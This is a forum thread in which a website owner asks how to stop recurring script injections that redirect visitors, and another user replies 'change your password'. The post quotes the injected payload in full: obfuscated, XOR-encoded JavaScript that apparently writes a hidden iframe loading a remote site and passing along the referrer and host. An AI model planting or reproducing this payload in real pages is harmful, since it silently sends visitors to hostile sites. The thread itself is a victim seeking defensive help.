Regular Attacks On My Website, How Do I Stop Them?

[xtl]

so some time ago (maybe two weeks) on my website strange &--#60;script&--#62;s started to appear. i can't understand how it's done but it redirects users to suspicious sites.

i've done some digging on that matter, found out it could be an xss attack. some people recommended using htmlpurifier, so i included it onto my files. yet it seems it didn't stop the attacks at all, literally 10 minutes ago i had to manually remove &--#60;script&--#62; again.

the script thingy contained this:

 

&--#60;br&--#62;<script type="text/javascript">var a="'1Aqapkrv'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02)'02'00tl6,'00'02)'02'00p,vg'00'02)'02'00cq'00'02)'02'00gpe'00'02)'02'00wkf'00'02)'02'00g,a'00'02)'02'00mo'00'02)'02'00-qlkvaj'1Df'00'02)'02'00gd'00'02)'02'00cwn'00'02)'02'00v]i'00'02)'02'00g{'00'02)'02'00umpf'1F'00'02)'02fgdcwnv]ig{umpf'02)'02'00'04pgdg'00'02)'02'00ppgp'1F'00'02)'02pgdgpgp'02)'02'00'04qg]p'00'02)'02'00gd'00'02)'02'00gp'00'02)'02'00pgp'1F'00'02)'02pgdgpgp'02)'02'00'04qmw'00'02)'02'00pag'1F'00'02)'02jmqv'1@'2C'2;fmawoglv,`mf{,crrglfAjknf'0:kdpcog'0;'1@'2C'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;i<clen;i++){b+=String.fromCharCode(a.charCodeAt(i)^2)}c=unescape(B)/&--#62;/&--#62;;document.write(c);</script>&--#60;br&--#62;

 

(by the way, i see here &--#60;script&--#62; is filtered nicely, maybe I installed htmlpurifier wrong? my code below)

 

<?php
   			require_once '/home/virfaith/public_html/htmlpurifier/library/HTMLPurifier.auto.php';
   			$config = HTMLPurifier_Config::createDefault();
   			$purifier = new HTMLPurifier($config);
   			$clean_html = $purifier->purify($dirty_html);
?>

 

my webpage consists of two .php files (index and one about author), cutenews folder (news system using text files instead of mysql) and htmlpurifier. my site is mostly made out of simple html, it's .php just because I wanted to include cutenews into it.

could anyone help me? it's the first time I deal with stuff like that.

[Byron]

Change your password.

[xtl]

well, seems obvious. i feel dumb now, sometimes i just kind of forget about this kind of stuff... thanks!